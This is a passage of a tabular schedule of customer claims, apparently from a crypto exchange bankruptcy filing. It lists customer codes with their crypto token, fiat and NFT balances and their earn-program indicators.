| 07349943 | | DOGE[2994.33254502], USD[0.00] | | |
| 07349944 | | CUSDT[5], DOGE[1.00996895], TRX[.00004992], USD[0.00] | | |
| 07349946 | | USD[10.00] | | |
| 07349947 | | USD[10.00] | | |
| 07349948 | | USD[10.00] | | |
| 07349950 | | BRZ[2], CUSDT[2], ETH[1.07661235], ETHW[1.07616017], GRT[1.00367791], TRX[5], USD[0.00] | Yes | |
| 07349952 | | DOGE[8.63089022], NFT [439058880645218188/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #18][1], NFT [559094270979950807/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #51][1], USD[0.00] | | |
| 07349953 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07349954 | | USD[10.00] | | |
| 07349955 | | CUSDT[1], DOGE[1], SUSHI[.03274214], TRX[1], UNI[.04375871], USD[3532.74], USDT[1] | | |
| 07349956 | | TRX[1], USD[0.01] | Yes | |
| 07349957 | | DOGE[5743.76761687], TRX[1], USD[0.00] | Yes | |
| 07349959 | | USD[788.28] | | |
| 07349961 | | USD[10.00] | | |
| 07349962 | | USD[10.00] | | |
| 07349964 | | USD[10.00] | | |
| 07349965 | | USD[10.00] | | |
| 07349966 | | USD[10.00] | | |
| 07349967 | | CUSDT[1], USD[0.66] | | |
| 07349968 | | BRZ[2], CUSDT[4], DOGE[2], TRX[5], USD[0.00] | | |
| 07349969 | | USD[10.00] | | |
| 07349970 | | DOGE[123.15408953], USD[0.00] | | |
| 07349972 | | USD[10.00] | | |
| 07349973 | | BTC[.00294849], DOGE[3], TRX[1], USD[10.00] | | |
| 07349975 | | USD[10.00] | | |
| 07349976 | | DOGE[910.43208391], USD[10.00] | | |
| 07349977 | | USD[0.00] | | |
| 07349978 | | BRZ[1], CUSDT[2], DOGE[0.87137428], TRX[3], USD[10.00] | | |
| 07349979 | | USD[10.00] | | |
| 07349980 | | BTC[.00018393], CUSDT[3], DOGE[1.52842257], ETH[.00051606], ETHW[.00051606], USD[0.01] | | |
| 07349981 | | BAT[1.07689934], BRZ[1], CUSDT[12], DOGE[601.96828037], GRT[.00025017], NFT [551964793561429619/Entrance Voucher #1745][1], SHIB[24347524.75395439], SUSHI[.00016905], TRX[2617.30568666], UNI[1.09487354], USD[0.31], USDT[1.0998441] | Yes | |
| 07349983 | | BRZ[1], DOGE[1], GBP[0.02], USD[5.81] | | |
| 07349984 | | CUSDT[2], DOGE[134.24872611], USD[0.88] | | |
| 07349985 | | USD[10.00] | | |
| 07349986 | | DOGE[.099], USD[0.00] | | |
| 07349987 | | USD[10.00] | | |
| 07349988 | | USD[10.00] | | |
| 07349989 | | DOGE[.00423146], USD[0.01], USDT[0] | | |
| 07349990 | | BTC[0], DOGE[.4563], USD[0.32] | | |
| 07349991 | | USD[10.00] | | |
| 07349992 | | USD[10.00] | | |
| 07349993 | | USD[0.01] | | |
| 07349994 | | BTC[.00047089], CUSDT[2], SHIB[1056125.52806276], TRX[3], USD[0.01] | | |
| 07349995 | | USD[0.01] | | |
| 07349996 | | USD[10.00] | | |
| 07349997 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349998 | | CUSDT[5], TRX[2], USD[0.00] | Yes | |
| 07349999 | | USD[11.07] | Yes | |
| 07350000 | | BRZ[2], CUSDT[1], USD[0.00] | | |
| 07350001 | | BAT[31.42275073], BRZ[6.32389033], BTC[0], CUSDT[28], DAI[.00269834], DOGE[158.55701349], ETH[0], NFT (308818769416162792/Sparrow#2)[1], NFT (398979946723508065/CryptoAvatar #26)[1], NFT (567814732369191784/CryptoAvatar #36)[1], SUSHI[.00004821], TRX[577.64487677], USD[0.00], USDT[0] | Yes | |
| 07350002 | | TRX[1], USD[5.10] | | |
| 07350003 | | USD[10.00] | | |
| 07350004 | | BTC[.0005203], DOGE[19.17994507], ETH[.01034874], ETHW[.01034874], USD[0.00] | | |
| 07350005 | | CUSDT[1], DOGE[31.37774484], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07350006 | | BTC[.00121184], SHIB[1], USD[0.94] | Yes | |
| 07350007 | | USD[10.00] | | |
| 07350008 | | USD[10.00] | | |
| 07350009 | | BRZ[1], USD[0.00] | | |
| 07350010 | | USD[10.00] | | |
| 07350012 | | BRZ[1], BTC[.00000007], CUSDT[4], TRX[1], USD[0.00], USDT[1] | | |
| 07350013 | | DOGE[1], SOL[.29128681], USD[0.07] | | |
| 07350014 | | DOGE[.00523704], USD[0.00] | | |
| 07350015 | | CUSDT[1], USD[45.60] | Yes | |
| 07350016 | | BRZ[1], CUSDT[24], DOGE[923.89280013], TRX[6], USD[0.90] | | |
| 07350017 | | USD[10.00] | | |
| 07350018 | | USD[10.00] | | |
| 07350019 | | USD[10.00] | | |
| 07350020 | | DOGE[1], TRX[1], USD[0.00], USDT[0.00000013] | Yes | |
| 07350021 | | BTC[0], CUSDT[3], DOGE[1], GRT[0.07081320], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07350022 | | DOGE[1], USD[0.00] | | |
| 07350023 | | USD[10.00] | | |
| 07350024 | | CUSDT[1], DOGE[1332.9538867], USD[10.00] | | |
| 07350025 | | USD[10.00] | | |
| 07350026 | | CUSDT[1], DOGE[1585.35646333], SOL[.8635756], TRX[212.77490496], USD[30.00] | | |
| 07350027 | | USD[10.00] | | |
| 07350028 | | CUSDT[528.97799051], DOGE[5600.86140788], TRX[341.81521162], USD[0.00] | Yes | |
| 07350029 | | SUSHI[.056], USD[0.49] | | |
| 07350030 | | CUSDT[1], DOGE[1.39540292], TRX[1], USD[152.78] | | |
| 07350032 | | USD[0.00] | | |
| 07350033 | | BRZ[2], BTC[.00021353], CUSDT[5], ETH[.00002339], ETHW[.00002339], GRT[1], TRX[2], USD[0.00] | | |
| 07350034 | | USD[10.00] | | |
| 07350035 | | USD[10.00] | | |
| 07350037 | | USD[10.00] | | |
| 07350038 | | USD[10.00] | | |
| 07350039 | | USD[10.00] | | |
| 07350040 | | USD[10.00] | | |
| 07350041 | | CUSDT[2], DOGE[1], TRX[7], USD[0.00] | | |
| 07350042 | | BRZ[496.67301838], BTC[.02581781], CUSDT[75694.23978763], DOGE[174.60569424], ETH[.23290887], ETHW[.23270652], GRT[.00004815], KSHIB[8226.66773064], LINK[.44929922], SHIB[1], SOL[1.15279382], TRX[91.64797571], USD[0.86], USDT[109.66168311] | Yes | |
| 07350043 | | BAT[1.0165555], BF_POINT[100], BRZ[1], CUSDT[12.00056819], DOGE[3], ETH[0], GRT[1], MATIC[0], NFT (302358389407509380/Magic Eden Pass)[1], NFT (356546341362890656/The Hill by FTX #6114)[1], SHIB[58], SOL[0.00000002], TRX[5], USD[0.00], USDT[1.06658878] | Yes | |
| 07350044 | | CUSDT[1], TRX[785.95000339], USD[0.00] | | |
| 07350045 | | USD[10.00] | | |
| 07350046 | | USD[10.00] | | |
| 07350047 | | USD[0.00] | | |
| 07350048 | | DOGE[.00000277], USD[0.00] | | |
| 07350049 | | USD[10.00] | | |
| 07350050 | | USD[10.00] | | |
| 07350051 | | CUSDT[1], DOGE[253.5129451], USD[13.07] | | |
| 07350052 | | USD[10.00] | | |
| 07350054 | | BRZ[0], CUSDT[2], DOGE[2.00000243], EUR[0.00], GRT[1], TRX[1], USD[0.87] | | |
| 07350055 | | BRZ[1], BTC[.01084269], DOGE[11458.33993462], GRT[53.73461023], SOL[16.06113752], TRX[19748.3567972], USD[1.56] | Yes | |
| 07350056 | | SHIB[268986.96103413], USD[0.00] | | |
| 07350057 | | ETH[.0044619], ETHW[.0044619], USD[0.00] | | |
| 07350058 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350059 | | USD[10.00] | | |
| 07350060 | | USD[10.00] | | |
| 07350061 | | USD[10.00] | | |
| 07350062 | | BAT[1.0165555], BRZ[2], CUSDT[1], DOGE[.00004315], GRT[1.00498957], SHIB[496257.57227294], TRX[268.25098822], USD[52.57], USDT[1.00600882] | Yes | |
| 07350063 | | USD[10.00] | | |
| 07350064 | | USD[10.00] | | |
| 07350065 | | DOGE[1], USD[33.13] | | |
| 07350066 | | BRZ[2], CUSDT[1], DAI[.00007298], DOGE[2], LINK[.00003976], USD[0.00] | Yes | |
| 07350067 | | DOGE[.00478404], USD[0.00] | | |
| 07350068 | | DOGE[7.99867106], TRX[.00005172], USD[0.00] | | |
| 07350069 | | CUSDT[292.83504834], TRX[2], USD[0.00] | | |
| 07350071 | | CUSDT[10], DOGE[4281.8267507], USD[0.00] | | |
| 07350072 | | BTC[.00003067], DOGE[109.07745159], GRT[.42139326], USD[0.99] | | |
| 07350073 | | BRZ[1], TRX[1], USD[379.55] | | |
| 07350074 | | USD[0.00] | | |
| 07350076 | | USD[10.00] | | |
| 07350077 | | USD[0.00], USDT[0] | | |
| 07350078 | | USD[10.00] | | |
| 07350079 | | BF_POINT[100], DOGE[0], SOL[0], SUSHI[0], TRX[2], USD[0.00], YFI[0] | | |
| 07350081 | | BRZ[2], CUSDT[13], DOGE[11.49724954], GRT[2.04415131], SHIB[1], SOL[0.00004736], TRX[5], USD[137.27] | Yes | |
| 07350082 | | CUSDT[.00007579], DOGE[5.68992788], USD[0.04] | Yes | |
| 07350083 | | DOGE[94.64928084], USD[0.00] | | |
| 07350084 | | BRZ[2], CUSDT[5], TRX[3], USD[0.10] | | |
| 07350085 | | USD[10.00] | | |
| 07350086 | | BRZ[1], CUSDT[31], TRX[6], USD[0.85] | | |
| 07350087 | | CUSDT[1], DOGE[0], LTC[0.05288167], USD[0.00] | | |
| 07350088 | | USD[10.00] | | |
| 07350089 | | CUSDT[1], DOGE[187.19152926], USD[5.00] | | |
| 07350090 | | CUSDT[3], TRX[1], USD[0.01] | Yes | |
| 07350091 | | USD[0.01] | | |
| 07350092 | | USD[10.00] | | |
| 07350093 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07350094 | | CUSDT[2], DOGE[5509.44928202], USD[10.00] | | |
| 07350095 | | USD[10.00] | | |
| 07350096 | | NFT (4403316245442701101/Entrance Voucher #4275)[1], USD[6290.99] | Yes | |
| 07350097 | | USD[10.00] | | |
| 07350098 | | BAT[0], CUSDT[2], DOGE[0], SHIB[4], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07350099 | | USD[10.00] | | |
| 07350100 | | CUSDT[1], TRX[482.9641417], USD[0.00] | Yes | |
| 07350101 | | DOGE[15.21131428], USD[0.00] | | |
| 07350102 | | BAT[0], BTC[0], CUSDT[1], DAI[0], DOGE[0], GRT[0], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07350103 | | USD[10.00] | | |
| 07350104 | | BCH[0], BRZ[1], DOGE[0], ETH[0], ETHW[0], SHIB[0], TRX[1], USD[0.00], USDT[1.06148717] | Yes | |
| 07350105 | | USD[10.00] | | |
| 07350106 | | DOGE[1733.63422475], USD[0.00] | Yes | |
| 07350107 | | BRZ[4], CUSDT[9], GRT[1], TRX[9], USD[0.00], USDT[2] | | |
| 07350108 | | CUSDT[13], DOGE[1320.90923791], ETH[.00713488], ETHW[.00705032], LTC[0], SHIB[1050853.98744852], SOL[.16793541], TRX[139.3568291$], USD[0.00] | Yes | |
| 07350109 | | BRZ[2], BTC[.00340425], CUSDT[6], DOGE[4.28488919], ETH[.00901996], ETHW[.00891052], SHIB[736759.65700146], TRX[2], USD[0.00] | Yes | |
| 07350110 | | USD[10.00] | | |
| 07350111 | | USD[10.00] | | |
| 07350112 | | BRZ[1], CUSDT[3], DOGE[10921.08224012], ETH[1.96224377], ETHW[1.96224377], SHIB[7861635.22012578], TRX[3], USD[0.00], USDT[1] | | |
| 07350113 | | BRZ[2], BTC[0], CUSDT[4], DOGE[0.09008259], ETH[0.00000438], ETHW[0.00000438], TRX[1], USD[0.00], USDT[1.10402041] | Yes | |
| 07350115 | | USD[10.00] | | |
| 07350116 | | BTC[0], DOGE[0], ETH[0], SHIB[1838.61569103], USD[0.00] | | |
| 07350117 | | USD[10.00] | | |
| 07350120 | | USD[0.71] | | |
| 07350121 | | BRZ[1], BTC[.011205], USD[10.00] | | |
| 07350122 | | DOGE[0.35511510], GBP[0.00], USD[0.00] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350124 | | USD[10.00] | | |
| 07350126 | | DOGE[6.07075283], USD[0.00] | | |
| 07350127 | | USD[10.00] | | |
| 07350128 | | USD[18.04] | | |
| 07350129 | | USD[0.00] | | |
| 07350131 | | USD[10.00] | | |
| 07350132 | | DOGE[1236.36023978], USD[0.00] | | |
| 07350133 | | BRZ[1], CUSDT[12], DOGE[.92931142], USD[0.00] | | |
| 07350134 | | BAT[1.0165555], BRZ[2], CUSDT[3], ETH[.00000234], ETHW[.00000234], GRT[2.05803109], USD[0.00], USDT[1.08081626] | Yes | |
| 07350135 | | USD[0.01] | | |
| 07350136 | | CUSDT[1007.0778101], DOGE[1786.78594259], ETH[.01873808], ETHW[.01873808], EUR[17.00], GRT[114.52699726], MATIC[10.227143], SHIB[1075568.19919583], TRX[604.69749937], USD[0.00] | | |
| 07350138 | | USD[10.00] | | |
| 07350139 | | USD[10.00] | | |
| 07350140 | | USD[10.00] | | |
| 07350141 | | USD[10.00] | | |
| 07350142 | | DOGE[2373.468], USD[1.47] | | |
| 07350143 | | USD[0.00] | | |
| 07350144 | | NFT [350617482971053863/3D CATPUNK #7670][1], NFT [452492784359777061/3D CATPUNK #1082][1], SHIB[976422.10713403], SOL[.09867148], USD[0.00] | Yes | |
| 07350146 | | CUSDT[2], DOGE[2], TRX[1], USD[0.00] | | |
| 07350147 | | USD[10.00] | | |
| 07350148 | | CUSDT[2], USD[18.15] | | |
| 07350149 | | USD[10.00] | | |
| 07350150 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07350151 | | BAT[1], BRZ[1], CUSDT[475.78285893], DOGE[5251.54078474], SHIB[2315428.38436744], TRX[6277.02912851], USD[0.00] | | |
| 07350152 | | USD[0.00] | | |
| 07350153 | | DOGE[0], USD[100.13] | | |
| 07350154 | | USD[10.00] | | |
| 07350155 | | USD[10.00] | | |
| 07350156 | | USD[10.00] | | |
| 07350157 | | USD[11.02] | Yes | |
| 07350158 | | BRZ[0], DOGE[1.57475297], USD[0.00], USDT[0] | | |
| 07350159 | | CUSDT[1], DOGE[.70001768], USD[0.00] | | |
| 07350160 | | CUSDT[2], DOGE[.16301161], TRX[191.22986849], USD[0.00] | | |
| 07350161 | | USD[10.00] | | |
| 07350162 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07350163 | | CUSDT[4], DOGE[2.00003333], SHIB[4], SOL[.00001723], TRX[2], USD[0.00], USDT[1] | | |
| 07350165 | | USD[10.00] | | |
| 07350166 | | BAT[0], BRZ[0], DOGE[0], GRT[0], LTC[0], SHIB[61779.06011858], SOL[0], TRX[0], USD[0.00] | | |
| 07350167 | | DOGE[2], GRT[96.11263277], SUSHI[74.19330105], USD[0.00] | | |
| 07350168 | | BTC[0], DAI[0], DOGE[0], USD[0.10], USDT[0] | | |
| 07350169 | | USD[10.00] | | |
| 07350170 | | USD[10.00] | | |
| 07350171 | | CUSDT[2], DOGE[2978.7991937], TRX[408.22375113], USD[0.00] | | |
| 07350172 | | USD[10.00] | | |
| 07350173 | | CUSDT[3], DOGE[3.000548], SHIB[1], SOL[41.36397139], TRX[0], USD[0.01] | Yes | |
| 07350174 | | USD[10.00] | | |
| 07350175 | | BAT[8.22974816], TRX[1], USD[0.00] | | |
| 07350176 | | CUSDT[7], USD[0.01] | Yes | |
| 07350177 | | USD[10.00] | | |
| 07350178 | | CUSDT[1], DOGE[.94976603], TRX[1], USD[132.52] | | |
| 07350179 | | BRZ[1], CUSDT[2], TRX[3], USD[0.00] | | |
| 07350180 | | USD[10.00] | | |
| 07350182 | | USD[0.12] | | |
| 07350183 | | USD[10.00] | | |
| 07350184 | | BRZ[0], BTC[0], DOGE[0.41194313], ETH[0], TRX[0], USD[0.00] | Yes | |
| 07350185 | | USD[10.00] | | |
| 07350186 | | BTC[.00180873], CUSDT[10], ETH[.01738875], ETHW[.01738875], SHIB[73765.08024139], USD[0.02] | | |
| 07350187 | | CUSDT[1], DAI[.98749899], DOGE[1], TRX[660.66605709], USD[0.09] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350188 | | USD[10.00] | | |
| 07350189 | | USD[10.00] | | |
| 07350190 | | BRZ[2], CUSDT[3], SOL[1.85160785], TRX[4], USD[0.02] | | |
| 07350191 | | USD[0.00] | | |
| 07350192 | | CUSDT[4], SHIB[583559.16401778], USD[0.00] | Yes | |
| 07350193 | | BAT[.99996588], CUSDT[.00001425], DOGE[.00004349], TRX[1], USD[0.00] | | |
| 07350194 | | DOGE[15.61561987], USD[0.00] | | |
| 07350195 | | USD[10.00] | | |
| 07350197 | | GRT[0], USD[0.00], USDT[0] | | |
| 07350198 | | CUSDT[5], DOGE[1053.86683952], ETH[.02797196], ETHW[.02797196], SHIB[295683.0277942], TRX[1], USD[2.12] | | |
| 07350200 | | DOGE[0], SHIB[271361.00288841], TRX[0], USD[0.02] | Yes | |
| 07350201 | | USD[10.00] | | |
| 07350202 | | BAT[1], CUSDT[2], DOGE[1502.66795669], LINK[.00092704], SUSHI[.00036453], TRX[3], UNI[.00212634], USD[3.80], USDT[1] | | |
| 07350203 | | CUSDT[1], DOGE[226.55177414], TRX[288.6038049], USD[0.00] | | |
| 07350204 | | USD[10.00] | | |
| 07350205 | | DOGE[31.39714172], USD[0.00] | | |
| 07350206 | | USD[0.01] | | |
| 07350207 | | USD[10.00] | | |
| 07350208 | | DOGE[1995.54537158], LTC[.05328427], TRX[123.55655482], USD[0.00] | | |
| 07350209 | | BRZ[1], DOGE[11], TRX[2.32309018], USD[0.00] | | |
| 07350210 | | BTC[.00020387], USD[0.00] | | |
| 07350211 | | TRX[10.59404421], UNI[0], USD[0.00], USDT[0] | | |
| 07350213 | | CUSDT[1], DOGE[95.99088214], USD[0.01] | | |
| 07350214 | | ETH[.00624096], ETHW[.00624096], USD[0.00] | | |
| 07350215 | | BRZ[1], CUSDT[1], DOGE[0], TRX[1], USD[0.01] | | |
| 07350216 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[199.57017374], USD[0.00] | | |
| 07350217 | | BAT[5.21378312], BRZ[1], CUSDT[5], DOGE[2], SOL[3.14634974], TRX[240.95995548], USD[0.00] | | |
| 07350218 | | USD[10.00] | | |
| 07350219 | | USD[10.00] | | |
| 07350220 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07350221 | | DOGE[.00004456], USD[0.00] | | |
| 07350222 | | USD[10.00] | | |
| 07350223 | | USD[10.00] | | |
| 07350224 | | USD[10.00] | | |
| 07350225 | | USD[10.00] | | |
| 07350226 | | USD[10.00] | | |
| 07350227 | | DOGE[144.81357871], USD[0.00] | Yes | |
| 07350228 | | USD[10.00] | | |
| 07350229 | | CUSDT[1], DOGE[2], TRX[22485.13027723], USD[0.00], USDT[1] | | |
| 07350230 | | USD[10.00] | | |
| 07350231 | | BTC[.00027528], CUSDT[5], DOGE[.00000721], USD[0.01] | | |
| 07350232 | | USD[10.00] | | |
| 07350233 | | USD[10.00] | | |
| 07350234 | | CUSDT[7], TRX[3], USD[0.01] | | |
| 07350235 | | GRT[1], TRX[205.18881094], USD[0.01] | | |
| 07350236 | | TRX[205.85905185], USD[0.00] | | |
| 07350237 | | BRZ[4], BTC[.00022071], CUSDT[19], DAI[0.89069311], DOGE[6.89279380], ETH[0.00001828], ETHW[0.00001828], GRT[2], LINK[0], LTC[0.17653705], TRX[2], UNI[0], USD[0.01], USDT[1.05855401] | Yes | |
| 07350238 | | BCH[.00584942], BRZ[1], CUSDT[2], DOGE[3], TRX[2], USD[0.01] | | |
| 07350239 | | BRZ[1], CUSDT[1], DOGE[3], ETH[0], TRX[1], USD[0.00] | | |
| 07350240 | | BTC[0.00010986], USD[0.00] | | |
| 07350241 | | DOGE[.00002942], TRX[.00004608], USD[0.00] | | |
| 07350242 | | BRZ[2], BTC[.00529621], CUSDT[14], DOGE[8792.5096121], ETH[.14291596], ETHW[.14201102], GRT[2.03638329], TRX[2], USD[108.39] | Yes | |
| 07350243 | | USD[10.00] | | |
| 07350244 | | USD[10.00] | | |
| 07350245 | | CUSDT[10], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], MATIC[0], NFT (369516602800321812/Careless Cat #733)[1], SOL[0.08168819], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07350246 | | USD[0.00] | | |
| 07350247 | | BAT[3], BRZ[1], CUSDT[4], DOGE[1], GRT[4], TRX[1], USD[0.00], USDT[2] | | |
| 07350248 | | BTC[0], DOGE[.386], USD[0.11] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350249 | | USD[.01] | | |
| 07350250 | | USD[10.00] | | |
| 07350251 | | USD[10.00] | | |
| 07350252 | | USD[10.00] | | |
| 07350253 | | BAT[0], BRZ[0], BTC[0.00000151], DOGE[815.31947340], ETH[0], PAXG[0], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07350256 | | DOGE[692.89416805], SHIB[1620642.28940745], USD[0.00] | | |
| 07350257 | | USD[10.00] | | |
| 07350258 | | USD[10.00] | | |
| 07350259 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07350261 | | USD[10.00] | | |
| 07350262 | | USD[10.00] | | |
| 07350263 | | BRZ[1], CUSDT[19], GRT[1], SHIB[26.84303139], TRX[1], USD[0.00] | | |
| 07350264 | | DOGE[1], USD[131.45] | | |
| 07350265 | | DOGE[1254.44040542], LINK[.30893038], TRX[1], USD[0.00] | | |
| 07350266 | | BRZ[1], BTC[.00007899], CUSDT[10], DOGE[17], TRX[3], USD[0.01], USDT[0] | | |
| 07350267 | | SOL[.0999], USD[0.00], YFI[.000999] | | |
| 07350268 | | USD[10.00] | | |
| 07350269 | | CUSDT[3], DOGE[1], GRT[1], USD[0.00] | | |
| 07350270 | | USD[10.00] | | |
| 07350271 | | USD[10.00] | | |
| 07350272 | | USD[11.10] | Yes | |
| 07350273 | | USD[10.00] | | |
| 07350274 | | USD[10.00] | | |
| 07350275 | | USD[10.00] | | |
| 07350276 | | USD[10.00] | | |
| 07350278 | | BRZ[1], CUSDT[2], DAI[9.87793109], DOGE[1144.9698731], USD[0.00] | | |
| 07350279 | | USD[0.00] | | |
| 07350280 | | BRZ[0], BTC[0], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07350282 | | CUSDT[4], DOGE[1], TRX[1], UNI[.00004588], USD[0.00] | | |
| 07350284 | | USD[10.00] | | |
| 07350285 | | USD[10.00] | | |
| 07350286 | | USD[0.00] | | |
| 07350287 | | USD[10.00] | | |
| 07350288 | | USD[10.00] | | |
| 07350290 | | USD[10.00] | | |
| 07350291 | | USD[0.01], USDT[0] | | |
| 07350292 | | USD[0.00] | Yes | |
| 07350293 | | BAT[7.19201533], USD[0.00] | | |
| 07350295 | | DOGE[89.58160836], USD[0.00] | Yes | |
| 07350296 | | BCH[0], BRZ[2], CUSDT[21], DOGE[0], ETH[.00612657], ETHW[.00612657], SUSHI[.0000408], TRX[1.21137051], USD[0.00] | | |
| 07350297 | | BRZ[1], CUSDT[6], TRX[1], USD[0.39] | Yes | |
| 07350298 | | BRZ[0], DOGE[0], LINK[0], USD[0.00] | | |
| 07350299 | | DOGE[3.44410813], TRX[129.48952782], USD[0.00] | | |
| 07350300 | | USD[10.00] | | |
| 07350301 | | CUSDT[2], USD[0.01] | | |
| 07350302 | | USD[10.00] | | |
| 07350303 | | BRZ[5], CUSDT[5], DOGE[2], TRX[5], USD[0.00] | | |
| 07350304 | | USD[423.02] | | |
| 07350307 | | USD[10.00] | | |
| 07350308 | | CUSDT[1], DOGE[122.41184633], USD[0.00] | | |
| 07350309 | | USD[10.00] | | |
| 07350311 | | CUSDT[1], DOGE[15.26835508], USD[0.00] | | |
| 07350312 | | USD[0.01] | | |
| 07350313 | | BRZ[1], CUSDT[6], DOGE[1], TRX[1], USD[0.00] | | |
| 07350314 | | BAT[350.03008333], BRZ[1], BTC[.00030355], CUSDT[9], DOGE[9], ETH[.32897008], ETHW[.32897008], LINK[.44261183], LTC[.0774981], SOL[17.88012827], SUSHI[9.56209914], TRX[11], USD[5.10], USDT[88.77587591], YFI[.00032854] | | |
| 07350315 | | USD[0.00], USDT[0] | | |
| 07350316 | | CUSDT[1], DOGE[1.00039449], TRX[2], USD[0.08] | | |
| 07350317 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350318 | | BRZ[1], CUSDT[1], DAI[.00014416], DOGE[1], TRX[1], USD[10.10] | | |
| 07350320 | | BTC[.02036321], DOGE[8439.3764817], ETH[.09919751], ETHW[.09919751], USD[0.00] | | |
| 07350321 | | DOGE[528.92526689], USD[10.00] | | |
| 07350322 | | BTC[.04125731], CUSDT[1356.53021395], DOGE[3150.48962536], ETH[2.28688603], ETHW[20.42465996], LINK[14.90074634], NFT (312925684935997538/DOTB #5716)[1], NFT (411112206146325689/Toasty Turts #2600)[1], NFT (475131751822273268/Toasty Turts #2088)[1], NFT (504479693534958348/A woman is a mystery #2)[1], NFT (535024429966467937/Toasty Turts #1263)[1], NFT (539691930157169022/ApexDucks #4815)[1], SHIB[21154617.11545438], SOL[2.12047908], TRX[821.46650455], USD[0.19] | Yes | |
| 07350323 | | CUSDT[2], ETH[0], TRX[1], USD[0.00] | | |
| 07350324 | | DOGE[22.61628127], USD[0.00] | | |
| 07350325 | | USD[10.00] | | |
| 07350326 | | USD[10.00] | | |
| 07350327 | | USD[10.00] | | |
| 07350328 | | USD[10.00] | | |
| 07350329 | | USD[10.00] | | |
| 07350330 | | BRZ[0], BTC[.00027503], CUSDT[4], DOGE[2440.14640067], GRT[4.3581584], KSHIB[265.33697481], MATIC[40.540852], SHIB[267239.95189381], USD[0.00] | | |
| 07350331 | | USD[10.00] | | |
| 07350332 | | USD[10.00] | | |
| 07350333 | | USD[10.00] | | |
| 07350334 | | BRZ[1], BTC[.00109359], DOGE[1300.70293071], SUSHI[.47650729], USD[0.00] | | |
| 07350335 | | USD[0.00] | | |
| 07350336 | | DOGE[177.48367549], USD[0.00] | | |
| 07350337 | | USD[10.00] | | |
| 07350338 | | DOGE[.00079113], TRX[1], USD[0.52] | | |
| 07350339 | | USD[10.00] | | |
| 07350340 | | USD[10.00] | | |
| 07350341 | | USD[10.00] | | |
| 07350342 | | BRZ[1], CUSDT[4677.95866537], DOGE[7.72773311], TRX[1304.6713069], USD[0.51] | | |
| 07350343 | | BTC[0], DOGE[48.71193276], USD[0.00] | | |
| 07350344 | | USD[0.83] | | |
| 07350345 | | CUSDT[6], DOGE[12.43164246], ETH[.00058823], ETHW[.00058823], TRX[1], USD[0.00] | | |
| 07350347 | | DOGE[140.5714313], USD[0.00] | | |
| 07350348 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07350349 | | USD[10.00] | | |
| 07350351 | | USD[10.00] | | |
| 07350352 | | BAT[1], BRZ[3], CUSDT[6], DOGE[10], GRT[2], SUSHI[7.36590431], TRX[3947.42823747], USD[0.00], USDT[1] | | |
| 07350353 | | BAT[3], BRZ[112.0436151], CUSDT[1175.48966634], GRT[1], USD[0.01] | | |
| 07350354 | | SHIB[603677.40543478], USD[0.00] | | |
| 07350355 | | CUSDT[1], DOGE[25458.9582485], USD[0.00] | Yes | |
| 07350356 | | BAT[19.7591254], BRZ[51.36544193], BTC[.0002306], CAD[1.26], CUSDT[11], DOGE[107.64656003], ETH[.00327428], ETHW[.00323324], GRT[133.36465072], KSHIB[1198.98814686], LINK[.53864909], SHIB[1191], SOL[.077287], SUSHI[2.22860953], TRX[135.00978516], UNI[.72607057], USD[2.11], USDT[1.06272868] | Yes | |
| 07350357 | | BCH[0.00000064], BTC[0], SUSHI[0], TRX[0.00336389], USD[0.01] | Yes | |
| 07350359 | | BRZ[3], CUSDT[4], DOGE[7.57724074], TRX[2], USD[0.00], USDT[0] | | |
| 07350361 | | USD[0.00] | | |
| 07350362 | | USD[0.00] | | |
| 07350363 | | USD[10.00] | | |
| 07350364 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], LINK[0], MATIC[16.5287287], NFT (301750698937209102/Crypto Boys #5)[1], USD[0.00] | Yes | |
| 07350365 | | CUSDT[1], DOGE[22317.33258485], USD[10.76] | Yes | |
| 07350366 | | DOGE[1], NEAR[249.25298631], SHIB[2], SOL[13.51526802], TRX[2], USD[7.17], USDT[1.01302471] | Yes | |
| 07350367 | | CUSDT[3], MATIC[.01668244], USD[0.00] | Yes | |
| 07350368 | | USD[10.00] | | |
| 07350369 | | USD[10.00] | | |
| 07350370 | | DOGE[.54453055], USD[0.00] | | |
| 07350371 | | USD[10.00] | | |
| 07350372 | | USD[10.00] | | |
